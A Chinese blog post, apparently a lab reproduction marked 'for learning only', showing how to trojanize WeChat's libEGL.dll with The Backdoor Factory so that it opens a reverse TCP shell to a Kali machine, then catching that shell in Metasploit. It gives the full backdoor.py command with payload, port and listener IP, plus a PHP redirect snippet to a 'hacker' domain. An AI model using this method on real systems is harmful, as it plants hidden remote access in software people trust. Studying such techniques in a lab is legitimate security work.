zoukankan      html  css  js  c++  java
  • 10.9 利用微信dll反弹shell复现

      该文章仅用于学习交流

    参考文章:http://www.sohu.com/a/321677034_99907709

    header() 向用户的浏览器发送HTTP报头

    echo”<meta charset=’UTF-8’/>”;

    header(“Content-Type:text/html;charset=utf-8”);//解决编码问题

    header(“location:http://www.hacker.com”);//页面跳转

    利用微信dll反弹shell

    Win7192.168.56.141

    Kali192.168.56.139

    打开windows7中的微信登录界面,不需要登录,再打开Process Explorer任务管理工具,招待微信所使用的dll文件

     

    这里我们选择libEGL.dll文件,将其复制到kalithe-backdoor-factory目录中,

    然后执行代码如下:

    python backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 8888 -H 192.168.56.139

    其中,-f 表示被劫持的 DLL 文件,-s 表示 shell 的类型,-P 表示 DLL 要连接 远程主机的端口,-H 表示 DLL 连接的远程主机

     

    可以看到生成文件已经存放在backdoored目录下

     

    然后将该文件重新放置在win7的微信安装目录下覆盖

    之后打开kali中的msf 设置exploit payload,随后设置 lhost lportIP 192.16856.139,端口是 8888,最后输入 exploit 或者 run,监听过来的 shell

    开启监听

     

    之后在win7中打开微信,就能在kali中接受到反弹的shell

     

  • 相关阅读:
    HDU4126
    训练赛Day6-The 36th ACMICPC Asia Regional Beijing Site
    弦图
    HDU4821 字符串哈希+尺取
    HDU1854
    HDU1166
    输入输出挂
    LightOj 1027 数学期望
    HDU
    HDU
  • 原文地址:https://www.cnblogs.com/x98339/p/11642393.html
Copyright © 2011-2022 走看看